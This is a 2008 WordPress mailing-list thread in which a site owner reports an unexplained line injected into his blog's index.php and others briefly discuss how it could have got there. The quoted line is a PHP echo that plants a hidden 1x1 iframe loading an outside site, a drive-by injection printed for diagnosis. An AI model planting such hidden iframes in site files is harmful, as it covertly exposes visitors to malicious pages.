[wp-hackers] XSS vuln in wordpress 2.7 ?

Joost de Valk joost at yoast.com
Mon Dec 22 17:33:58 GMT 2008


If the file is writable for the webserver and file access is enabled  
on the webserver: yes.

Joost de Valk

joost at yoast.com

http://yoast.com/
http://twitter.com/jdevalk

Sent from my iPhone

On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:

> Wow. That's nasty, and malicious. Could a plugin do that?
>
> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>
>> Hello,
>>
>> For some reason i found my blog's index.php (not theme's index.php)
>> with the following piece of code right before the ?>
>>
>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>
>> I tried looking at the logs. No luck. The file's permisions look  
>> like this:
>>
>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50 /home/madalin/www/ 
>> index.php
>>
>> I'm still trying to figure out how that line got there. I've
>> downloaded wordpress right from wordpress.org, and the server is a
>> dedicated one, only two users with shell access to it.
>>
>> Any suggestions ?
>>
>> -- 
>> Regards,
>> madalin
>> http://madalin.eu
>> http://www.tg-jiu.ro
>> http://www.radioomega.ro
>> _______________________________________________
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers


More information about the wp-hackers mailing list